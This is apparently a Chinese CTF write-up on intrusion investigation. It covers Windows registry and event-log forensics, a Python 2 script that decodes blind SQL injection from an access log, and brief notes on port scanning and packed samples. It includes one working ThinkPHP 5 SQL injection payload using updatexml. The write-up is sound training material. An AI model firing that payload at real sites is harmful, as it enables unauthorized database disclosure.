入侵排查

入侵排查_1

打开注册表查看路径HKEY_CURRENT_USERsoftwareMicrosoftInternetExplorerTypedUrls

得到ie历史记录

入侵排查_2

打开注册表查看路径

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun

得到启动项文件名

入侵排查_3

在windows事件查看器中筛选ID 4720

得到用户账户创建时间

WEB安全分析

网站入侵

访问网站，根据logo特征是ThikPHP,题目中提到内网地址泄露，对应的就是TP5的SQL注入及信息泄露历史漏洞

index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1`

日志分析

1. 手工转义
2. 脚本转义，python2

# coding:utf-8

import re

import urllib

f = open('access.log','r')

lines = f.readlines()

datas = []

for line in lines:

    t = urllib.unquote(line)   

    if '1765' in t and 'flag' in t:  # 过滤出与flag相关，正确的猜解

        datas.append(t)

flag_ascii = {} 

for data in datas:

    matchObj = re.search( r'LIMIT 0,1),(.*?),1))>(.*?) AND', data)  

    if matchObj:

        key = int(matchObj.group(1))

        value = int(matchObj.group(2))+1

        flag_ascii[key] = value

flag = ''

for value in flag_ascii.values():

    flag += chr(value)

print flag

端口探测

Nmap使用

80-tcp-http

恶意文件分析

简单的分析_1

使用string.exe

简单的分析_2

加壳的样本